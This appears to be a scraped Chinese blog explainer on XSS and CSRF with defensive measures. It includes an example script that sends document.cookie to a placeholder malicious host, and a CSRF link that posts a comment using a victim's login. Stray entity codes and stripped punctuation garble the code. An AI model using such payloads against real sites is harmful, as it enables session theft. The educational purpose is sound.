网站设计一般包括什么,给公司做网站数据分析,做搜狗pc网站排名,安阳做网站电话XSS(cross-site-script)跨站脚本攻击
跨站脚本攻击是通过在网站中注入恶意代码#xff0c;来达到劫取用户cookie信息#xff0c;或者实施其他破坏行动。 例如#xff1a;一个网站如果没有针对XSS做响应的安全措施#xff0c;而且它存在添加评论的功能#xff0c;那么用户…XSS(cross-site-script)跨站脚本攻击
跨站脚本攻击是通过在网站中注入恶意代码来达到劫取用户cookie信息或者实施其他破坏行动。 例如一个网站如果没有针对XSS做响应的安全措施而且它存在添加评论的功能那么用户可以在添加评论时输入如下文本 scriptvar xhr new XMLHttpRequest();xhr.open(GET,http://恶意网站.com/steal?cookiedocument.cookie,true);xhr.send()
/script当其他用户查看包含这个评论的页面时他们的浏览器会执行这段恶意脚本导致攻击者成功窃取他们的Cookie并进一步滥用这些信息。 如何防范XSS
开发者应该采取措施如输入验证、对用户输入尽心格式适当转义或者过滤以保证用户输入的内容不会被当做代码执行。使用安全的编码库、限制可执行的脚本内容。在前端设置HTTP头部中的Content Security Policy (CSP)
CSRF(cross-site-request-forgery)跨站请求伪造 当你登录一个网站A后在没有登出的情况下你又跑到一个其他的论坛上闲逛然后你看到一个美女的图片你出于好奇心点击了美女图片这个时候可能就被攻击了原因是美女图片的的超链接link可能是不法分子弄的指向的可能是A网站由于你在A网站还是登陆态那么你点击的这个link就是以你登录态的进行的比如可以用你的登录态发布评论严重的可能进行转账。而你却浑然不知。 比如图片的html的代码是这样的
a hrefhttp://www.a.com/addcomments?commentXX是XXimg srchttp://xx.com/beauty.jpg//a如何防范CSRF
1.在请求地址中添加 token 并验证
CSRF 攻击之所以能够成功是因为黑客可以完全伪造用户的请求该请求中所有的用户验证信息都是存在于 cookie 中因此黑客可以在不知道这些验证信息的情况下直接利用用户自己的 cookie 来通过安全验证。要抵御 CSRF关键在于在请求中放入黑客所不能伪造的信息并且该信息不存在于 cookie 之中。可以在 HTTP 请求中以参数的形式加入一个随机产生的 token并在服务器端建立一个拦截器来验证这个 token如果请求中没有 token 或者 token 内容不正确则认为可能是 CSRF 攻击而拒绝该请求。
2.验证 HTTP Referer 字段
根据 HTTP 协议在 HTTP 头中有一个字段叫 Referer它记录了该 HTTP 请求的来源地址。在通常情况下访问一个安全受限页面的请求来自于同一个网站比如需要访问 bank.example/withdraw?ac…用户必须先登陆 bank.example然后通过点击页面上的按钮来触发转账事件。这时该转帐请求的 Referer 值就会是转账按钮所在的页面的 URL通常是以 bank.example 域名开头的地址。而如果黑客要对银行网站实施 CSRF 攻击他只能在他自己的网站构造请求当用户通过黑客的网站发送请求到银行时该请求的 Referer 是指向黑客自己的网站。因此要防御 CSRF 攻击银行网站只需要对于每一个转账请求验证其 Referer 值如果是以 bank.example 开头的域名则说明该请求是来自银行网站自己的请求是合法的。如果 Referer 是其他网站的话则有可能是黑客的 CSRF 攻击拒绝该请求。